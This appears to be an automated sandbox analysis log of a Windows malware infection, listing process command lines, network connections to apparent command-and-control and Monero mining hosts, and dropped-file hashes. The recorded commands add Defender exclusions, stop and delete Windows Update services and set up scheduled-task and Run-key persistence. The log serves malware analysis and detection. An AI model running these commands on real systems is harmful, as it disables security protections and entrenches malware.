C:\Users\Admin\AppData\Local\Temp\EA86.exe
"C:\Users\Admin\AppData\Local\Temp\EA86.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\822.exe
C:\Users\Admin\AppData\Local\Temp\822.exe
C:\Users\Admin\AppData\Local\f7f0864e-3e3c-4332-880c-a88fb4c0026e\build2.exe
"C:\Users\Admin\AppData\Local\f7f0864e-3e3c-4332-880c-a88fb4c0026e\build2.exe"
C:\Users\Admin\AppData\Local\Temp\ss31.exe
"C:\Users\Admin\AppData\Local\Temp\ss31.exe"
C:\Users\Admin\AppData\Local\Temp\ECA.exe
C:\Users\Admin\AppData\Local\Temp\ECA.exe
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\f7f0864e-3e3c-4332-880c-a88fb4c0026e\build3.exe
"C:\Users\Admin\AppData\Local\f7f0864e-3e3c-4332-880c-a88fb4c0026e\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\f7f0864e-3e3c-4332-880c-a88fb4c0026e\build2.exe
"C:\Users\Admin\AppData\Local\f7f0864e-3e3c-4332-880c-a88fb4c0026e\build2.exe"
C:\Users\Admin\AppData\Local\Temp\13CC.exe
C:\Users\Admin\AppData\Local\Temp\13CC.exe
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"
C:\Users\Admin\AppData\Local\Temp\1AF1.exe
C:\Users\Admin\AppData\Local\Temp\1AF1.exe
C:\Users\Admin\AppData\Local\Temp\13CC.exe
C:\Users\Admin\AppData\Local\Temp\13CC.exe
C:\Users\Admin\AppData\Local\Temp\13CC.exe
"C:\Users\Admin\AppData\Local\Temp\13CC.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\13CC.exe
"C:\Users\Admin\AppData\Local\Temp\13CC.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\2756.exe
C:\Users\Admin\AppData\Local\Temp\2756.exe
C:\Users\Admin\AppData\Local\Temp\2C1A.exe
C:\Users\Admin\AppData\Local\Temp\2C1A.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 780
C:\Users\Admin\AppData\Local\90515bee-c87e-49cd-be89-0c302c226596\build2.exe
"C:\Users\Admin\AppData\Local\90515bee-c87e-49cd-be89-0c302c226596\build2.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1444 -s 264
C:\Users\Admin\AppData\Local\90515bee-c87e-49cd-be89-0c302c226596\build2.exe
"C:\Users\Admin\AppData\Local\90515bee-c87e-49cd-be89-0c302c226596\build2.exe"
C:\Users\Admin\AppData\Local\90515bee-c87e-49cd-be89-0c302c226596\build3.exe
"C:\Users\Admin\AppData\Local\90515bee-c87e-49cd-be89-0c302c226596\build3.exe"
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\69C0.exe
C:\Users\Admin\AppData\Local\Temp\69C0.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 1816
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe zuhwtyqtfkk
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.96.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | 0.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | leaderspro.ps | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| US | 8.8.8.8:53 | 14.242.73.109.in-addr.arpa | udp |
| EE | 91.235.234.235:80 | tcp | |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| DE | 116.203.220.83:11111 | 116.203.220.83 | tcp |
| KW | 37.34.248.24:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | 41.249.124.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.220.203.116.in-addr.arpa | udp |
| KR | 211.119.84.111:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | 24.248.34.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.84.119.211.in-addr.arpa | udp |
| KR | 211.119.84.111:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | bz.bbbeioaag.com | udp |
| HK | 103.100.211.218:80 | bz.bbbeioaag.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| PS | 109.73.242.14:443 | leaderspro.ps | tcp |
| AT | 77.73.134.27:80 | 77.73.134.27 | tcp |
| US | 8.8.8.8:53 | 27.134.73.77.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| IE | 13.69.239.74:443 | tcp | |
| KW | 37.34.248.24:80 | colisumy.com | tcp |
| KR | 211.119.84.111:80 | zexeq.com | tcp |
| US | 82.117.255.127:80 | 82.117.255.127 | tcp |
| US | 8.8.8.8:53 | 127.255.117.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.4.107.13.in-addr.arpa | udp |
| DE | 167.235.158.92:13190 | tcp | |
| US | 8.8.8.8:53 | adsmanager.facebook.com | udp |
| FR | 157.240.196.17:443 | adsmanager.facebook.com | tcp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| NL | 157.240.247.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 92.158.235.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.196.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | count.iiagjaggg.com | udp |
| HK | 154.221.31.191:80 | count.iiagjaggg.com | tcp |
| US | 8.8.8.8:53 | 35.247.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.31.221.154.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aapu.at | udp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 44.55.182.186.in-addr.arpa | udp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| CZ | 146.19.173.221:80 | 146.19.173.221 | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 221.173.19.146.in-addr.arpa | udp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | janjackfrs.com | udp |
| RU | 45.143.137.122:80 | janjackfrs.com | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 122.137.143.45.in-addr.arpa | udp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | api.ip.sb | udp |
| US | 172.67.75.172:443 | api.ip.sb | tcp |
| US | 8.8.8.8:53 | 172.75.67.172.in-addr.arpa | udp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 93.184.220.29:80 | tcp | |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| AR | 186.182.55.44:80 | aapu.at | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| NL | 51.15.55.100:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.34.170:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| PL | 51.68.143.81:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 100.55.15.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.34.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.143.68.51.in-addr.arpa | udp |
Files
memory/404-122-0x0000000000A40000-0x0000000000A49000-memory.dmp
memory/404-124-0x0000000000400000-0x00000000007F6000-memory.dmp
memory/1924-123-0x0000000000FD0000-0x0000000000FE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\E7D4.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\E7D4.exe
| MD5 | 6b20cecdd6ed336dacaf9a4427d9ccbe |
| SHA1 | 38c7528dbe7299637e34b199997d9d4479188cd5 |
| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\E93D.exe
| MD5 | b1a2bbdcc4a30dcf00cfe46b93024977 |
| SHA1 | 7770bad5950b46b112b439c753387bad0467fe89 |
| SHA256 | 4436795757d1981a99cd33323e4a21f8138f838d899ef73bd9b7fe77f06329e1 |
| SHA512 | da10672a28287efeb47b2f9304bf5c93dc3b9956232a80fb5d2bd0591cd10800021518d0b18993359848f3e06d3a54710fd4e9304a1d794f40ee83048463afeb |
memory/4972-137-0x0000000000050000-0x00000000005D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EA86.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
C:\Users\Admin\AppData\Local\Temp\EA86.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
C:\Users\Admin\AppData\Local\Temp\E93D.exe
| MD5 | b1a2bbdcc4a30dcf00cfe46b93024977 |
| SHA1 | 7770bad5950b46b112b439c753387bad0467fe89 |
| SHA256 | 4436795757d1981a99cd33323e4a21f8138f838d899ef73bd9b7fe77f06329e1 |
| SHA512 | da10672a28287efeb47b2f9304bf5c93dc3b9956232a80fb5d2bd0591cd10800021518d0b18993359848f3e06d3a54710fd4e9304a1d794f40ee83048463afeb |
memory/2212-146-0x0000000000400000-0x0000000000425000-memory.dmp
memory/2212-148-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EFE6.exe
| MD5 | 381cfc40c1326d466120412eff910355 |
| SHA1 | 44b3d7e7f513a697d7d6ab6c01ba38a117e00f23 |
| SHA256 | 6fbad1747829b93eda875e92e77b53572d039da270faf0705b6493b19a02891b |
| SHA512 | 12899673daf34398f48bf5454fc40ccb78eb32c695a5f6ada037ce2ab9536d185577c0fdce974b5d3ff7840f367cd50499b722e1a2528aacad5dccd468479f49 |
C:\Users\Admin\AppData\Local\Temp\EFE6.exe
| MD5 | 381cfc40c1326d466120412eff910355 |
| SHA1 | 44b3d7e7f513a697d7d6ab6c01ba38a117e00f23 |
| SHA256 | 6fbad1747829b93eda875e92e77b53572d039da270faf0705b6493b19a02891b |
| SHA512 | 12899673daf34398f48bf5454fc40ccb78eb32c695a5f6ada037ce2ab9536d185577c0fdce974b5d3ff7840f367cd50499b722e1a2528aacad5dccd468479f49 |
memory/3928-154-0x0000000000400000-0x0000000000537000-memory.dmp
memory/3928-156-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4016-157-0x00000000025B0000-0x00000000026CB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EA86.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
memory/3928-158-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2212-159-0x0000000000400000-0x0000000000425000-memory.dmp
memory/3928-160-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\3d47c20d-b680-4e77-937e-ecae7598e425\EA86.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
memory/4688-174-0x0000000000920000-0x0000000000929000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EA86.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
memory/3928-176-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\EA86.exe
| MD5 | 42d0bcb8341a32314f8d152ff89947ca |
| SHA1 | a5bcdec29d9a79d0d7c77a841801eb7b5db8cd36 |
| SHA256 | 76461f8b0f3a9a0902c9f9875709a52a5029f3dfe051ee1b4d9ace496da1eed5 |
| SHA512 | 51808417ff076cd45c6a886cf4fca01a612d6f1c695a465c086004d77fd4a804dfed9096a3a2fc3fc07bfb8e838973984197e387ab948ab9c7e315683da9bb98 |
memory/4908-181-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-182-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 0a0291b9bdf89c7e506366a8be70a80c |
| SHA1 | a30ddab885654862ba0be0159155bc99945c053f |
| SHA256 | 31631ce5dfb41c09757fbd14367f9e46dc012eed1b8d462e933a34c102441272 |
| SHA512 | b0c29fd46693496d0bd726db2a615049c8cc2996bc38132a57878706a8ee022bbb964b3f9c9bb67e520a82f2144d352655287e015f3617c85fabf72f752e30d5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | d3177fd80cc63121671d36c36e2d6f58 |
| SHA1 | 668e67603a071408c728150eafd866cad937ce9a |
| SHA256 | f8b7b58b69cb040d9e05fdb4d668b93479e8ccb8a865f07b9e0f1cc0238f99b5 |
| SHA512 | eafe30c813b80fe487883a114b9f401456574047bfd43cbe5532393cbc4b2bb4b76df5e4374d53e04a0fce145979e8a51ba471e20680a146dd57cfd36dc35e50 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 89d78eb124083dfc7d87ddbf1acdff7f |
| SHA1 | 069a3b78c24057041ccbd928672113f95523a17d |
| SHA256 | ad777b3e2ac62663252cfcd7495e832f1a043bc3e0e4ecda3abf1c291eedcb0c |
| SHA512 | 34632fe51ac8fb71e52dd7490e01a3e92bbcfa545cd0309d50cb1706f336e09d754b9df04913e6a0f91cbc374cdb365da29c0b29768b56410e82d310b5ba6ebe |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 79d7dd3dcd2097a10fd705745e488194 |
| SHA1 | 86bde11561426f76d49fca8a6a88c87146c59cdc |
| SHA256 | 8be63cd9d00da5a6371ef87af9a37cdbf43e30421fa7e07a48d2b0fccc5b6ae7 |
| SHA512 | 1c95e70c3ce26b9a6ff311fa1bc5a4fd7ad6158c6a90c4c2379d6babef69ec4da2ddf16fc8af6c7a0893a7ef96424a334d68a55652c4f2151671775607392b6a |
memory/4908-198-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-200-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4908-201-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4972-202-0x0000000061E00000-0x0000000061EF3000-memory.dmp
